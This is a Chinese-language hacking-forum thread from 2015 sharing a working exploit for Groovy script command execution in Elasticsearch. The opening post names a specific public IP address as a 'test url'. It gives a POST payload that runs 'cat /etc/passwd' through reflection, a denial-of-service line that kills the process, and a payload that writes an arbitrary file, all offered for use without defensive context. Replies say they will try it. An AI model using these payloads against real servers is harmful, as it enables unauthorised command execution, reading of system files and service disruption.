搜索
查看: 522|回复: 2

Elasticsearch Groovy任意命令执行漏洞EXP

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-3-5 17:57:11 | 显示全部楼层 |阅读模式
测试url:http://190.196.67.252:9200/_search?pretty
POST:
  1. {"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName("java.io.BufferedReader").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName("java.io.InputStreamReader").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("cat /etc/passwd").getInputStream())).readLines()","lang": "groovy"}}}
复制代码


拒绝服务:
  1. Runtime.getRumtime().exit(-1)
复制代码

文件写入:
  1. java.lang.Math.class.forName("java.io.FileOutputStream").getConstructor(java.io.File.class).newInstance(java.lang.Math.class.forName("java.io.File").getConstructor(java.lang.String.class).newInstance("c:/1.txt")).write(java.lang.Math.class.forName("java.lang.String").getConstructor(java.lang.String.class).newInstance("fuck").getBytes())
复制代码



游客,如果您要查看本帖隐藏内容请回复

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
Object 该用户已被删除
发表于 2015-3-5 18:32:07 | 显示全部楼层
欧了,试一下
冰封 该用户已被删除
发表于 2015-3-14 19:57:37 | 显示全部楼层
回复看下 嘿嘿
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表